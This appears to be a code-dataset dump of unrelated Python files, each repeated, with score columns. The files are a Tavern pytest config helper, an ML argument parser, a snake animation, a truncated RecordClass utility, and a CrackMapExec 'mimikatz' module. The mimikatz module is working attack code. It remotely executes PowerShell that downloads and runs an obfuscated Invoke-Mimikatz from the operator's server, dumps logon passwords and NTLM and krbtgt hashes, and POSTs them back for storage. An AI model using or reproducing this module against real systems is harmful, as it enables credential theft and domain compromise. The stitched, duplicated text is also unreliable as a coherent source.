ini_global_cfg_paths = pytest_config.getini("tavern-global-cfg") or []
# THEN load command line, to allow overwriting of values
cmdline_global_cfg_paths = pytest_config.getoption("tavern_global_cfg") or []
all_paths = ini_global_cfg_paths + cmdline_global_cfg_paths
global_cfg = load_global_config(all_paths)
try:
loaded_variables = global_cfg["variables"]
except KeyError:
logger.debug("Nothing to format in global config files")
else:
tavern_box = Box({"tavern": {"env_vars": dict(os.environ)}})
global_cfg["variables"] = format_keys(loaded_variables, tavern_box)
# Can be overridden in tests
global_cfg["strict"] = _load_global_strictness(pytest_config)
global_cfg["follow_redirects"] = _load_global_follow_redirects(pytest_config)
global_cfg["backends"] = _load_global_backends(pytest_config)
global_cfg["merge_ext_values"] = _load_global_merge_ext(pytest_config)
logger.debug("Global config: %s", global_cfg)
return global_cfg
def _load_global_backends(pytest_config):
"""Load which backend should be used"""
backend_settings = {}
backends = ["http", "mqtt"]
for b in backends:
backend_settings[b] = get_option_generic(
pytest_config, "tavern-{}-backend".format(b), None
)
return backend_settings
def _load_global_strictness(pytest_config):
"""Load the global 'strictness' setting"""
options = get_option_generic(pytest_config, "tavern-strict", [])
return StrictLevel.from_options(options)
def _load_global_follow_redirects(pytest_config):
"""Load the global 'follow redirects' setting"""
return get_option_generic(pytest_config, "tavern-always-follow-redirects", False)
def _load_global_merge_ext(pytest_config):
"""Load the global setting about whether external values should be merged or not"""
return get_option_generic(pytest_config, "tavern-merge-ext-function-values", True)
def get_option_generic(pytest_config, flag, default):
"""Get a configuration option or return the default
Priority order is cmdline, then ini, then default"""
cli_flag = flag.replace("-", "_")
ini_flag = flag
# Lowest priority
use = default
# Middle priority
if pytest_config.getini(ini_flag) is not None:
use = pytest_config.getini(ini_flag)
# Top priority
if pytest_config.getoption(cli_flag) is not None:
use = pytest_config.getoption(cli_flag)
return use
|
tavern/testutils/pytesthook/util.py
|
from functools import lru_cache
import logging
import os
from box import Box
from tavern.util.dict_util import format_keys
from tavern.util.general import load_global_config
from tavern.util.strict_util import StrictLevel
logger = logging.getLogger(__name__)
def add_parser_options(parser_addoption, with_defaults=True):
"""Add argparse options
This is shared between the CLI and pytest (for now)
See also testutils.pytesthook.hooks.pytest_addoption
"""
parser_addoption(
"--tavern-global-cfg",
help="One or more global configuration files to include in every test",
nargs="+",
)
parser_addoption(
"--tavern-http-backend",
help="Which http backend to use",
default="requests" if with_defaults else None,
)
parser_addoption(
"--tavern-mqtt-backend",
help="Which mqtt backend to use",
default="paho-mqtt" if with_defaults else None,
)
parser_addoption(
"--tavern-strict",
help="Default response matching strictness",
default=None,
nargs="+",
choices=["json", "headers", "redirect_query_params"],
)
parser_addoption(
"--tavern-use-default-traceback",
help="Use normal python-style traceback",
default=False,
action="store_true",
)
parser_addoption(
"--tavern-always-follow-redirects",
help="Always follow HTTP redirects",
default=False,
action="store_true",
)
parser_addoption(
"--tavern-file-path-regex",
help="Regex to search for Tavern YAML test files",
default=r".+\.tavern\.ya?ml$",
action="store",
nargs=1,
)
parser_addoption(
"--tavern-merge-ext-function-values",
help="Merge values from external functions in http requests",
default=False,
action="store_true",
)
def add_ini_options(parser):
"""Add an option to pass in a global config file for tavern
See also testutils.pytesthook.util.add_parser_options
"""
parser.addini(
"tavern-global-cfg",
help="One or more global configuration files to include in every test",
type="linelist",
default=[],
)
parser.addini(
"tavern-http-backend", help="Which http backend to use", default="requests"
)
parser.addini(
"tavern-mqtt-backend", help="Which mqtt backend to use", default="paho-mqtt"
)
parser.addini(
"tavern-strict",
help="Default response matching strictness",
type="args",
default=None,
)
parser.addini(
"tavern-use-default-traceback",
help="Use normal python-style traceback",
type="bool",
default=False,
)
parser.addini(
"tavern-always-follow-redirects",
help="Always follow HTTP redirects",
type="bool",
default=False,
)
parser.addini(
"tavern-file-path-regex",
help="Regex to search for Tavern YAML test files",
default=r".+\.tavern\.ya?ml$",
type="args",
)
parser.addini(
"tavern-merge-ext-function-values",
help="Merge values from external functions in http requests",
default=False,
type="bool",
)
@lru_cache()
def load_global_cfg(pytest_config):
"""Load globally included config files from cmdline/cfg file arguments
Args:
pytest_config (pytest.Config): Pytest config object
Returns:
dict: variables/stages/etc from global config files
Raises:
exceptions.UnexpectedKeysError: Invalid settings in one or more config
files detected
"""
# Load ini first
ini_global_cfg_paths = pytest_config.getini("tavern-global-cfg") or []
# THEN load command line, to allow overwriting of values
cmdline_global_cfg_paths = pytest_config.getoption("tavern_global_cfg") or []
all_paths = ini_global_cfg_paths + cmdline_global_cfg_paths
global_cfg = load_global_config(all_paths)
try:
loaded_variables = global_cfg["variables"]
except KeyError:
logger.debug("Nothing to format in global config files")
else:
tavern_box = Box({"tavern": {"env_vars": dict(os.environ)}})
global_cfg["variables"] = format_keys(loaded_variables, tavern_box)
# Can be overridden in tests
global_cfg["strict"] = _load_global_strictness(pytest_config)
global_cfg["follow_redirects"] = _load_global_follow_redirects(pytest_config)
global_cfg["backends"] = _load_global_backends(pytest_config)
global_cfg["merge_ext_values"] = _load_global_merge_ext(pytest_config)
logger.debug("Global config: %s", global_cfg)
return global_cfg
def _load_global_backends(pytest_config):
"""Load which backend should be used"""
backend_settings = {}
backends = ["http", "mqtt"]
for b in backends:
backend_settings[b] = get_option_generic(
pytest_config, "tavern-{}-backend".format(b), None
)
return backend_settings
def _load_global_strictness(pytest_config):
"""Load the global 'strictness' setting"""
options = get_option_generic(pytest_config, "tavern-strict", [])
return StrictLevel.from_options(options)
def _load_global_follow_redirects(pytest_config):
"""Load the global 'follow redirects' setting"""
return get_option_generic(pytest_config, "tavern-always-follow-redirects", False)
def _load_global_merge_ext(pytest_config):
"""Load the global setting about whether external values should be merged or not"""
return get_option_generic(pytest_config, "tavern-merge-ext-function-values", True)
def get_option_generic(pytest_config, flag, default):
"""Get a configuration option or return the default
Priority order is cmdline, then ini, then default"""
cli_flag = flag.replace("-", "_")
ini_flag = flag
# Lowest priority
use = default
# Middle priority
if pytest_config.getini(ini_flag) is not None:
use = pytest_config.getini(ini_flag)
# Top priority
if pytest_config.getoption(cli_flag) is not None:
use = pytest_config.getoption(cli_flag)
return use
| 0.585812 | 0.171651 |
import argparse
from pathlib import Path
import json
import shutil
import sys
from termcolor import colored, cprint
from pprint import pprint
def command_interface(title=None):
parser = argparse.ArgumentParser(description=title)
parser.add_argument('--config', '-cf', default=None, help='training configs json file')
parser.add_argument('--devices', '-d', nargs='+', default=None, type=int, help='CUDA devices. Use CPU if None')
parser.add_argument('--rand_seed', '-r', default=1, type=int, help='random seed initialization')
parser.add_argument('--name', '-n', default='exp', help='name of this experiment')
parser.add_argument('--mode', '-m', default='new', choices=['new', 'resume', 'test', 'finetune'], help='running mode')
parser.add_argument('--iters', '-i', default=1, type=int, help='number of iterations to run the experiment')
parser.add_argument('--omniscient', '-o', action='store_true', help='if specified, set validation set = test set')
parser.add_argument('--overwrite', '-ow', action='store_true', help='if specified, overwrite existing folder without asking')
parser.add_argument('--workers', '-w', default=12, type=int, help='number of workers for the dataloader')
parser.add_argument('--amp', '-a', action='store_true', help='if specified, turn amp on')
args = parser.parse_args()
pprint(vars(args))
config = json.load(open(args.config))
save_root = Path('weights')/args.name
if args.mode == 'new' and Path(save_root).exists():
if not args.overwrite and args.name != 'exp':
txt = input(colored(f'[WARNING] {save_root} exists. Overwrite [Y/N]? ', color='yellow', attrs=['bold']))
else:
txt = 'y'
if txt.lower() == 'y':
cprint(f'Overwrite {save_root} folder...', color='yellow', attrs=['bold'])
shutil.rmtree(save_root)
else:
cprint('Abort...', color='yellow', attrs=['bold'])
sys.exit()
return args, config, save_root
if __name__ == '__main__':
command_interface()
|
util/command_interface.py
|
import argparse
from pathlib import Path
import json
import shutil
import sys
from termcolor import colored, cprint
from pprint import pprint
def command_interface(title=None):
parser = argparse.ArgumentParser(description=title)
parser.add_argument('--config', '-cf', default=None, help='training configs json file')
parser.add_argument('--devices', '-d', nargs='+', default=None, type=int, help='CUDA devices. Use CPU if None')
parser.add_argument('--rand_seed', '-r', default=1, type=int, help='random seed initialization')
parser.add_argument('--name', '-n', default='exp', help='name of this experiment')
parser.add_argument('--mode', '-m', default='new', choices=['new', 'resume', 'test', 'finetune'], help='running mode')
parser.add_argument('--iters', '-i', default=1, type=int, help='number of iterations to run the experiment')
parser.add_argument('--omniscient', '-o', action='store_true', help='if specified, set validation set = test set')
parser.add_argument('--overwrite', '-ow', action='store_true', help='if specified, overwrite existing folder without asking')
parser.add_argument('--workers', '-w', default=12, type=int, help='number of workers for the dataloader')
parser.add_argument('--amp', '-a', action='store_true', help='if specified, turn amp on')
args = parser.parse_args()
pprint(vars(args))
config = json.load(open(args.config))
save_root = Path('weights')/args.name
if args.mode == 'new' and Path(save_root).exists():
if not args.overwrite and args.name != 'exp':
txt = input(colored(f'[WARNING] {save_root} exists. Overwrite [Y/N]? ', color='yellow', attrs=['bold']))
else:
txt = 'y'
if txt.lower() == 'y':
cprint(f'Overwrite {save_root} folder...', color='yellow', attrs=['bold'])
shutil.rmtree(save_root)
else:
cprint('Abort...', color='yellow', attrs=['bold'])
sys.exit()
return args, config, save_root
if __name__ == '__main__':
command_interface()
| 0.269422 | 0.055311 |
from cme.helpers import create_ps_command, get_ps_script, obfs_ps_script, gen_random_string, validate_ntlm, write_log
from datetime import datetime
import re
class CMEModule:
'''
Executes PowerSploit's Invoke-Mimikatz.ps1 script
Module by @byt3bl33d3r
'''
name = 'mimikatz'
description = "Executes PowerSploit's Invoke-Mimikatz.ps1 script"
def options(self, context, module_options):
'''
COMMAND Mimikatz command to execute (default: 'sekurlsa::logonpasswords')
'''
self.mimikatz_command = 'privilege::debug sekurlsa::logonpasswords exit'
if module_options and 'COMMAND' in module_options:
self.mimikatz_command = module_options['COMMAND']
#context.log.debug("Mimikatz command: '{}'".format(self.mimikatz_command))
self.obfs_name = gen_random_string()
def on_admin_login(self, context, connection):
payload = '''
IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-Mimikatz.ps1');
$creds = Invoke-{func_name} -Command '{command}';
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
$request.Method = 'POST';
$request.ContentType = 'application/x-www-form-urlencoded';
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();'''.format(server=context.server,
port=context.server_port,
addr=context.localip,
func_name=self.obfs_name,
command=self.mimikatz_command)
context.log.debug('Payload: {}'.format(payload))
payload = create_ps_command(payload)
connection.execute(payload)
context.log.success('Executed payload')
def on_request(self, context, request):
if 'Invoke-Mimikatz.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
else:
request.send_response(404)
request.end_headers()
def uniquify_tuples(self, tuples):
"""
uniquify mimikatz tuples based on the password
cred format- (credType, domain, username, password, hostname, sid)
Stolen from the Empire project.
"""
seen = set()
return [item for item in tuples if "{}{}{}{}".format(item[0],item[1],item[2],item[3]) not in seen and not seen.add("{}{}{}{}".format(item[0],item[1],item[2],item[3]))]
def parse_mimikatz(self, data):
"""
Parse the output from Invoke-Mimikatz to return credential sets.
This was directly stolen from the Empire project as well.
"""
# cred format:
# credType, domain, username, password, hostname, sid
creds = []
# regexes for "sekurlsa::logonpasswords" Mimikatz output
regexes = ["(?s)(?<=msv :).*?(?=tspkg :)", "(?s)(?<=tspkg :).*?(?=wdigest :)", "(?s)(?<=wdigest :).*?(?=kerberos :)", "(?s)(?<=kerberos :).*?(?=ssp :)", "(?s)(?<=ssp :).*?(?=credman :)", "(?s)(?<=credman :).*?(?=Authentication Id :)", "(?s)(?<=credman :).*?(?=mimikatz)"]
hostDomain = ""
domainSid = ""
hostName = ""
lines = data.split("\n")
for line in lines[0:2]:
if line.startswith("Hostname:"):
try:
domain = line.split(":")[1].strip()
temp = domain.split("/")[0].strip()
domainSid = domain.split("/")[1].strip()
hostName = temp.split(".")[0]
hostDomain = ".".join(temp.split(".")[1:])
except:
pass
for regex in regexes:
p = re.compile(regex)
for match in p.findall(data):
lines2 = match.split("\n")
username, domain, password = "", "", ""
for line in lines2:
try:
if "Username" in line:
username = line.split(":",1)[1].strip()
elif "Domain" in line:
domain = line.split(":",1)[1].strip()
elif "NTLM" in line or "Password" in line:
password = line.split(":",1)[1].strip()
except:
pass
if username != "" and password != "" and password != "(null)":
sid = ""
# substitute the FQDN in if it matches
if hostDomain.startswith(domain.lower()):
domain = hostDomain
sid = domainSid
if validate_ntlm(password):
credType = "hash"
else:
credType = "plaintext"
# ignore machine account plaintexts
if not (credType == "plaintext" and username.endswith("$")):
creds.append((credType, domain, username, password, hostName, sid))
if len(creds) == 0:
# check if we have lsadump output to check for krbtgt
# happens on domain controller hashdumps
for x in xrange(8,13):
if lines[x].startswith("Domain :"):
domain, sid, krbtgtHash = "", "", ""
try:
domainParts = lines[x].split(":")[1]
domain = domainParts.split("/")[0].strip()
sid = domainParts.split("/")[1].strip()
# substitute the FQDN in if it matches
if hostDomain.startswith(domain.lower()):
domain = hostDomain
sid = domainSid
for x in xrange(0, len(lines)):
if lines[x].startswith("User : krbtgt"):
krbtgtHash = lines[x+2].split(":")[1].strip()
break
if krbtgtHash != "":
creds.append(("hash", domain, "krbtgt", krbtgtHash, hostName, sid))
except Exception as e:
pass
if len(creds) == 0:
# check if we get lsadump::dcsync output
if '** SAM ACCOUNT **' in lines:
domain, user, userHash, dcName, sid = "", "", "", "", ""
for line in lines:
try:
if line.strip().endswith("will be the domain"):
domain = line.split("'")[1]
elif line.strip().endswith("will be the DC server"):
dcName = line.split("'")[1].split(".")[0]
elif line.strip().startswith("SAM Username"):
user = line.split(":")[1].strip()
elif line.strip().startswith("Object Security ID"):
parts = line.split(":")[1].strip().split("-")
sid = "-".join(parts[0:-1])
elif line.strip().startswith("Hash NTLM:"):
userHash = line.split(":")[1].strip()
except:
pass
if domain != "" and userHash != "":
creds.append(("hash", domain, user, userHash, dcName, sid))
return self.uniquify_tuples(creds)
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.getheader('content-length'))
data = response.rfile.read(length)
#We've received the response, stop tracking this host
response.stop_tracking_host()
if len(data):
creds = self.parse_mimikatz(data)
if len(creds):
context.log.success("Found credentials in Mimikatz output (domain\\username:password)")
for cred_set in creds:
credtype, domain, username, password,_,_ = cred_set
context.db.add_credential(credtype, domain, username, password)
context.log.highlight('{}\\{}:{}'.format(domain, username, password))
log_name = 'Mimikatz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name)
context.log.info("Saved Mimikatz's output to {}".format(log_name))
|
cme/modules/mimikatz.py
|
from cme.helpers import create_ps_command, get_ps_script, obfs_ps_script, gen_random_string, validate_ntlm, write_log
from datetime import datetime
import re
class CMEModule:
'''
Executes PowerSploit's Invoke-Mimikatz.ps1 script
Module by @byt3bl33d3r
'''
name = 'mimikatz'
description = "Executes PowerSploit's Invoke-Mimikatz.ps1 script"
def options(self, context, module_options):
'''
COMMAND Mimikatz command to execute (default: 'sekurlsa::logonpasswords')
'''
self.mimikatz_command = 'privilege::debug sekurlsa::logonpasswords exit'
if module_options and 'COMMAND' in module_options:
self.mimikatz_command = module_options['COMMAND']
#context.log.debug("Mimikatz command: '{}'".format(self.mimikatz_command))
self.obfs_name = gen_random_string()
def on_admin_login(self, context, connection):
payload = '''
IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-Mimikatz.ps1');
$creds = Invoke-{func_name} -Command '{command}';
$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/');
$request.Method = 'POST';
$request.ContentType = 'application/x-www-form-urlencoded';
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
$request.ContentLength = $bytes.Length;
$requestStream = $request.GetRequestStream();
$requestStream.Write( $bytes, 0, $bytes.Length );
$requestStream.Close();
$request.GetResponse();'''.format(server=context.server,
port=context.server_port,
addr=context.localip,
func_name=self.obfs_name,
command=self.mimikatz_command)
context.log.debug('Payload: {}'.format(payload))
payload = create_ps_command(payload)
connection.execute(payload)
context.log.success('Executed payload')
def on_request(self, context, request):
if 'Invoke-Mimikatz.ps1' == request.path[1:]:
request.send_response(200)
request.end_headers()
with open(get_ps_script('Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script:
ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
request.wfile.write(ps_script)
else:
request.send_response(404)
request.end_headers()
def uniquify_tuples(self, tuples):
"""
uniquify mimikatz tuples based on the password
cred format- (credType, domain, username, password, hostname, sid)
Stolen from the Empire project.
"""
seen = set()
return [item for item in tuples if "{}{}{}{}".format(item[0],item[1],item[2],item[3]) not in seen and not seen.add("{}{}{}{}".format(item[0],item[1],item[2],item[3]))]
def parse_mimikatz(self, data):
"""
Parse the output from Invoke-Mimikatz to return credential sets.
This was directly stolen from the Empire project as well.
"""
# cred format:
# credType, domain, username, password, hostname, sid
creds = []
# regexes for "sekurlsa::logonpasswords" Mimikatz output
regexes = ["(?s)(?<=msv :).*?(?=tspkg :)", "(?s)(?<=tspkg :).*?(?=wdigest :)", "(?s)(?<=wdigest :).*?(?=kerberos :)", "(?s)(?<=kerberos :).*?(?=ssp :)", "(?s)(?<=ssp :).*?(?=credman :)", "(?s)(?<=credman :).*?(?=Authentication Id :)", "(?s)(?<=credman :).*?(?=mimikatz)"]
hostDomain = ""
domainSid = ""
hostName = ""
lines = data.split("\n")
for line in lines[0:2]:
if line.startswith("Hostname:"):
try:
domain = line.split(":")[1].strip()
temp = domain.split("/")[0].strip()
domainSid = domain.split("/")[1].strip()
hostName = temp.split(".")[0]
hostDomain = ".".join(temp.split(".")[1:])
except:
pass
for regex in regexes:
p = re.compile(regex)
for match in p.findall(data):
lines2 = match.split("\n")
username, domain, password = "", "", ""
for line in lines2:
try:
if "Username" in line:
username = line.split(":",1)[1].strip()
elif "Domain" in line:
domain = line.split(":",1)[1].strip()
elif "NTLM" in line or "Password" in line:
password = line.split(":",1)[1].strip()
except:
pass
if username != "" and password != "" and password != "(null)":
sid = ""
# substitute the FQDN in if it matches
if hostDomain.startswith(domain.lower()):
domain = hostDomain
sid = domainSid
if validate_ntlm(password):
credType = "hash"
else:
credType = "plaintext"
# ignore machine account plaintexts
if not (credType == "plaintext" and username.endswith("$")):
creds.append((credType, domain, username, password, hostName, sid))
if len(creds) == 0:
# check if we have lsadump output to check for krbtgt
# happens on domain controller hashdumps
for x in xrange(8,13):
if lines[x].startswith("Domain :"):
domain, sid, krbtgtHash = "", "", ""
try:
domainParts = lines[x].split(":")[1]
domain = domainParts.split("/")[0].strip()
sid = domainParts.split("/")[1].strip()
# substitute the FQDN in if it matches
if hostDomain.startswith(domain.lower()):
domain = hostDomain
sid = domainSid
for x in xrange(0, len(lines)):
if lines[x].startswith("User : krbtgt"):
krbtgtHash = lines[x+2].split(":")[1].strip()
break
if krbtgtHash != "":
creds.append(("hash", domain, "krbtgt", krbtgtHash, hostName, sid))
except Exception as e:
pass
if len(creds) == 0:
# check if we get lsadump::dcsync output
if '** SAM ACCOUNT **' in lines:
domain, user, userHash, dcName, sid = "", "", "", "", ""
for line in lines:
try:
if line.strip().endswith("will be the domain"):
domain = line.split("'")[1]
elif line.strip().endswith("will be the DC server"):
dcName = line.split("'")[1].split(".")[0]
elif line.strip().startswith("SAM Username"):
user = line.split(":")[1].strip()
elif line.strip().startswith("Object Security ID"):
parts = line.split(":")[1].strip().split("-")
sid = "-".join(parts[0:-1])
elif line.strip().startswith("Hash NTLM:"):
userHash = line.split(":")[1].strip()
except:
pass
if domain != "" and userHash != "":
creds.append(("hash", domain, user, userHash, dcName, sid))
return self.uniquify_tuples(creds)
def on_response(self, context, response):
response.send_response(200)
response.end_headers()
length = int(response.headers.getheader('content-length'))
data = response.rfile.read(length)
#We've received the response, stop tracking this host
response.stop_tracking_host()
if len(data):
creds = self.parse_mimikatz(data)
if len(creds):
context.log.success("Found credentials in Mimikatz output (domain\\username:password)")
for cred_set in creds:
credtype, domain, username, password,_,_ = cred_set
context.db.add_credential(credtype, domain, username, password)
context.log.highlight('{}\\{}:{}'.format(domain, username, password))
log_name = 'Mimikatz-{}-{}.log'.format(response.client_address[0], datetime.now().strftime("%Y-%m-%d_%H%M%S"))
write_log(data, log_name)
context.log.info("Saved Mimikatz's output to {}".format(log_name))
| 0.268078 | 0.163445 |
import matplotlib as mpl
mpl.use('TkAgg')
import time
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import tkinter as Tk
import snake_classes
# Hacky global variables (shame on you)
root = None
reset_button = None
snake = None
ax = None
canvas = None
trapped_msg = None
def make_snake(body_color = 'viridis'):
global snake
snake = snake_classes.Snake((int(((ax.get_xlim()[1] - ax.get_xlim()[0]) / 2)) + 4,
int(((ax.get_ylim()[1] - ax.get_ylim()[0]) / 2))),
'right', 16, label='snake1')
snake.set_body_color(body_color)
return(snake)
def update_canvas():
global snake
global ax
global canvas
directions = ('up', 'down', 'left', 'right')
dir_choices = list(directions)
new_dir = None
for i in range(len(dir_choices)):
# Type conversion is because validation functions are expecting
# a str type not a numpy.str_ type
new_dir = str(np.random.choice(dir_choices))
new_head_pos = snake.get_new_head_pos(new_dir)
if (ax.get_xlim()[0] == new_head_pos[0]
or ax.get_xlim()[1] + 1 == new_head_pos[0]
or ax.get_ylim()[0] == new_head_pos[1]
or ax.get_ylim()[1] + 1 == new_head_pos[1]):
dir_choices.remove(new_dir)
new_dir = None
continue
try:
snake.move_snake_one(new_dir)
break
except ValueError:
dir_choices.remove(new_dir)
new_dir = None
continue
if new_dir is None:
add_trapped_msg()
else:
snake.remove_from_axes(ax)
snake.draw_on_axes(ax)
canvas.draw()
root.after(250, update_canvas)
def add_trapped_msg():
global ax
global canvas
global trapped_msg
width, height = ax.figure.get_size_inches()
text_height= height * 0.05
size = text_height * 72
trapped_msg = ax.text(0.5, 0.5, 'Your snake is trapped!',
horizontalalignment='center',
verticalalignment='center',
transform=ax.transAxes, size=size,
bbox=dict(boxstyle='square',
facecolor='#FF8080',
edgecolor='#FFCDCD'))
canvas.draw()
reset_button.config(state='active')
def _reset():
global snake
global ax
global canvas
global trapped_msg
if trapped_msg is None:
raise AssertionError('_reset() ran with a trapped_msg!')
trapped_msg.remove()
snake.remove_from_axes(ax)
snake = make_snake()
snake.draw_on_axes(ax)
canvas.draw()
time.sleep(0.25)
update_canvas()
reset_button.config(state='disabled')
def _quit():
root.quit() # stops mainloop
def main():
global root
global reset_button
global snake
global ax
global canvas
root = Tk.Tk()
root.wm_title("Meandering Snake")
fig = plt.figure(figsize=(8, 8), dpi=100)
ax = fig.add_subplot(111)
canvas = FigureCanvasTkAgg(fig, master=root)
canvas.draw()
canvas.get_tk_widget().pack(side=Tk.TOP, fill=Tk.BOTH, expand=1)
BOARD_SIZE = (30, 30)
ax.set_aspect('equal')
ax.set_xlim(0, BOARD_SIZE[0])
ax.set_ylim(0, BOARD_SIZE[1])
ax.set_xticks([i for i in range(BOARD_SIZE[0] + 1)])
ax.set_yticks([i for i in range(BOARD_SIZE[1] + 1)])
ax.tick_params(length=0)
ax.set_xticklabels([])
ax.set_yticklabels([])
width, height = ax.figure.get_size_inches()
spine_lw = min(width, height) * 0.02 * 72
del width
del height
spine_color = '#000000'
ax.spines['top'].set_linewidth(spine_lw)
ax.spines['top'].set_edgecolor(spine_color)
ax.spines['bottom'].set_linewidth(spine_lw)
ax.spines['bottom'].set_edgecolor(spine_color)
ax.spines['left'].set_linewidth(spine_lw)
ax.spines['left'].set_edgecolor(spine_color)
ax.spines['right'].set_linewidth(spine_lw)
ax.spines['right'].set_edgecolor(spine_color)
ax.set_position([0, 0, 1, 1])
ax.set_facecolor('#C1C1C1')
quit_button = Tk.Button(master=root, text='Quit', command=_quit)
quit_button.pack(side=Tk.BOTTOM)
reset_button = Tk.Button(master=root, text='Reset', command=_reset)
reset_button.config(state='disabled')
reset_button.pack(side=Tk.BOTTOM)
snake = make_snake()
snake.draw_on_axes(ax)
canvas.draw()
root.after(250, update_canvas)
Tk.mainloop()
if __name__ == '__main__':
main()
|
meandering_snake/meandering_snake.py
|
import matplotlib as mpl
mpl.use('TkAgg')
import time
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import tkinter as Tk
import snake_classes
# Hacky global variables (shame on you)
root = None
reset_button = None
snake = None
ax = None
canvas = None
trapped_msg = None
def make_snake(body_color = 'viridis'):
global snake
snake = snake_classes.Snake((int(((ax.get_xlim()[1] - ax.get_xlim()[0]) / 2)) + 4,
int(((ax.get_ylim()[1] - ax.get_ylim()[0]) / 2))),
'right', 16, label='snake1')
snake.set_body_color(body_color)
return(snake)
def update_canvas():
global snake
global ax
global canvas
directions = ('up', 'down', 'left', 'right')
dir_choices = list(directions)
new_dir = None
for i in range(len(dir_choices)):
# Type conversion is because validation functions are expecting
# a str type not a numpy.str_ type
new_dir = str(np.random.choice(dir_choices))
new_head_pos = snake.get_new_head_pos(new_dir)
if (ax.get_xlim()[0] == new_head_pos[0]
or ax.get_xlim()[1] + 1 == new_head_pos[0]
or ax.get_ylim()[0] == new_head_pos[1]
or ax.get_ylim()[1] + 1 == new_head_pos[1]):
dir_choices.remove(new_dir)
new_dir = None
continue
try:
snake.move_snake_one(new_dir)
break
except ValueError:
dir_choices.remove(new_dir)
new_dir = None
continue
if new_dir is None:
add_trapped_msg()
else:
snake.remove_from_axes(ax)
snake.draw_on_axes(ax)
canvas.draw()
root.after(250, update_canvas)
def add_trapped_msg():
global ax
global canvas
global trapped_msg
width, height = ax.figure.get_size_inches()
text_height= height * 0.05
size = text_height * 72
trapped_msg = ax.text(0.5, 0.5, 'Your snake is trapped!',
horizontalalignment='center',
verticalalignment='center',
transform=ax.transAxes, size=size,
bbox=dict(boxstyle='square',
facecolor='#FF8080',
edgecolor='#FFCDCD'))
canvas.draw()
reset_button.config(state='active')
def _reset():
global snake
global ax
global canvas
global trapped_msg
if trapped_msg is None:
raise AssertionError('_reset() ran with a trapped_msg!')
trapped_msg.remove()
snake.remove_from_axes(ax)
snake = make_snake()
snake.draw_on_axes(ax)
canvas.draw()
time.sleep(0.25)
update_canvas()
reset_button.config(state='disabled')
def _quit():
root.quit() # stops mainloop
def main():
global root
global reset_button
global snake
global ax
global canvas
root = Tk.Tk()
root.wm_title("Meandering Snake")
fig = plt.figure(figsize=(8, 8), dpi=100)
ax = fig.add_subplot(111)
canvas = FigureCanvasTkAgg(fig, master=root)
canvas.draw()
canvas.get_tk_widget().pack(side=Tk.TOP, fill=Tk.BOTH, expand=1)
BOARD_SIZE = (30, 30)
ax.set_aspect('equal')
ax.set_xlim(0, BOARD_SIZE[0])
ax.set_ylim(0, BOARD_SIZE[1])
ax.set_xticks([i for i in range(BOARD_SIZE[0] + 1)])
ax.set_yticks([i for i in range(BOARD_SIZE[1] + 1)])
ax.tick_params(length=0)
ax.set_xticklabels([])
ax.set_yticklabels([])
width, height = ax.figure.get_size_inches()
spine_lw = min(width, height) * 0.02 * 72
del width
del height
spine_color = '#000000'
ax.spines['top'].set_linewidth(spine_lw)
ax.spines['top'].set_edgecolor(spine_color)
ax.spines['bottom'].set_linewidth(spine_lw)
ax.spines['bottom'].set_edgecolor(spine_color)
ax.spines['left'].set_linewidth(spine_lw)
ax.spines['left'].set_edgecolor(spine_color)
ax.spines['right'].set_linewidth(spine_lw)
ax.spines['right'].set_edgecolor(spine_color)
ax.set_position([0, 0, 1, 1])
ax.set_facecolor('#C1C1C1')
quit_button = Tk.Button(master=root, text='Quit', command=_quit)
quit_button.pack(side=Tk.BOTTOM)
reset_button = Tk.Button(master=root, text='Reset', command=_reset)
reset_button.config(state='disabled')
reset_button.pack(side=Tk.BOTTOM)
snake = make_snake()
snake.draw_on_axes(ax)
canvas.draw()
root.after(250, update_canvas)
Tk.mainloop()
if __name__ == '__main__':
main()
| 0.413359 | 0.168309 |
import copy
import itertools
import sys
class RecordClass(object):
__slots__ = ()
required_attributes = ()
optional_attributes = {}
def __init__(self, *args, **kwargs):
# First, check for the maximum number of arguments.
required_attributes = type(self).required_attributes
if len(args) + len(kwargs.keys()) < len(required_attributes):
raise ValueError(
'Invalid arguments', type(self), args, kwargs, self.__slots__)
# Second, check if there are any overlapping arguments.
conflicts = (frozenset(kwargs.keys()) &
frozenset(required_attributes[:len(args)]))
if conflicts:
raise TypeError(
'Keyword arguments conflict with positional arguments: %s',
conflicts)
# Third, check all required attributes are provided.
required_kwargs = set(kwargs.keys()) & set(required_attributes)
num_provided = len(args) + len(required_kwargs)
if num_provided != len(required_attributes):
raise TypeError(
'__init__ takes exactly %d arguments but %d were given: %s' % (
len(required_attributes), num_provided,
required_attributes))
for slot, arg in itertools.chain(
zip(type(self).required_attributes, args), kwargs.items()):
object.__setattr__(self, slot, arg)
# Set defaults.
for attr, value in type(self).optional_attributes.items():
if attr not in kwargs:
if callable(value):
value = value()
object.__setattr__(self, attr, value)
def __str__(self):
return self._str(type(self).all_attribute_names)
def _str(self, str_attrs):
attrs = []
for attr in str_attrs:
attrs.append('%s=%s' % (attr, repr(getattr(self, attr))))
return '%s(%s)' % (type(self).__name__, ', '.join(attrs))
__repr__ = __str__
def __eq__(self, other):
return (
self is other
or type(self) == type(other)
and self._isequal_fields(other, self.__slots__))
def __ne__(self, other):
return not self == other
def _isequal_fields(self, other, fields):
return all(getattr(self, attr) == getattr(other, attr)
for attr in fields)
def __copy__(self):
return type(self)(**{attr: getattr(self, attr)
